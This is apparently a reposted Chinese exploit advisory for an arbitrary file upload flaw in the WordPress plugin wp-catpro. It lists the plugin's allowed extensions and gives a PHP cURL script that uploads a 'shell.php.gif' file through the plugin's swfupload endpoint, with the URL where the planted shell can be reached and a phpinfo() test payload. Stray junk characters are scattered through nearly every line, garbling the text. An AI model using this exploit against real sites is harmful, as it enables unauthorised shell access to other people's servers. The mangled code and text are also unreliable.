WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

8 q9 h8 l' |( A; A& \作者  => Zikou-16
; q2 e2 Q" ]. h7 T# `% m( n邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
% N! ]& [* U( L9 P" n* i+ E6 c下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
# S0 s) F: V! L/ \) a. Z
#=> Exploit 信息:
------------------
7 v  P+ Q* E5 u# 攻击者可以上传 file/shell.php.gif
* i1 x+ D/ e6 W$ H# R) |6 g# ("jpg", "gif", "png")  // Allowed file extensions
% e. }6 R4 \4 `- ?! w5 C9 |% E# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
1 X/ I6 a8 _( h1 O  Q
#=> Exploit
-----------
<?php
6 ^" J& d- L: w  R0 f
2 m% L, P5 k5 o6 F, r$uploadfile="zik.php.gif";
, v( T3 @4 T) l7 z$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
5 ?8 Y( |9 K: M0 O: Ucurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
: p* \7 l+ z. b5 S/ W7 l3 S+ Zcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
; `# |' K' c; v0 X: J( m$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
, o8 H+ B2 ]  ?# \' {/ O
) j3 D& L% d- \2 K) ]$ hShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
0 W" U! I2 L9 n. L1 u  f  ?>
<?php
) X# r7 ]5 _$ e/ R" ~, pphpinfo();
" {! o2 G5 j1 F/ x6 ^?>